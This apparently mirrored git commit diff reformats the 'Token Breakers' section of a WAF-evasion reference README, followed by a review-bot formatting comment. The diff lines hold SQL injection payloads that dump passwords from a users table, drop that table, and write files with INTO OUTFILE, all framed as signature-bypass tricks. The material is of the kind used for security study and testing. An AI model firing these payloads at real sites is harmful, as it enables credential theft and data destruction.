mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2024-12-22 23:23:28 +07:00
Added stuff follow up update
This commit is contained in:
parent
b4afef22b6
commit
179eda145d
10
README.md
@ -2475,12 +2475,12 @@ __13. Token Breakers__
|
||||
- Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature.
|
||||
- However, the request must still remain valid while using token-breakers.
|
||||
|
||||
__Case__: Unknown Token for the Tokenizer
|
||||
__Payload__: `?id=‘-sqlite_version() UNION SELECT password FROM users --`
|
||||
- __Case__: Unknown Token for the Tokenizer
|
||||
- __Payload__: `?id=‘-sqlite_version() UNION SELECT password FROM users --`
|
||||
|
||||
__Case__: Unknown Context for the Parser (Notice the uncontexted bracket)
|
||||
__Payload 1__: `?id=123);DROP TABLE users --`
|
||||
__Payload 2__: `?id=1337) INTO OUTFILE ‘xxx’ --`
|
||||
- __Case__: Unknown Context for the Parser (Notice the uncontexted bracket)
|
||||
- __Payload 1__: `?id=123);DROP TABLE users --`
|
||||
- __Payload 2__: `?id=1337) INTO OUTFILE ‘xxx’ --`
|
||||
|
||||
> __TIP:__ More payloads can be crafted via this [cheat sheet](https://github.com/attackercan/cpp-sql-fuzzer).
|
||||
|
||||
|
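Review bot: The added `- __Case__:` and `- __Payload__:` lines are flat bullets at the same level as the two descriptive bullets at the top of the hunk, so in the rendered list nothing ties a payload to its case, and the two cases run straight on from the definition of token breakers. Consider indenting the payload bullets under their `- __Case__:` bullet (two payloads under the second case) so each case renders as one group. While these lines are being touched, "uncontexted bracket" in the second case would read more clearly as "unmatched closing bracket". The commit message "Added stuff follow up update" also says nothing about this being a list-formatting change to the Token Breakers section; a one-line description would make the history easier to search.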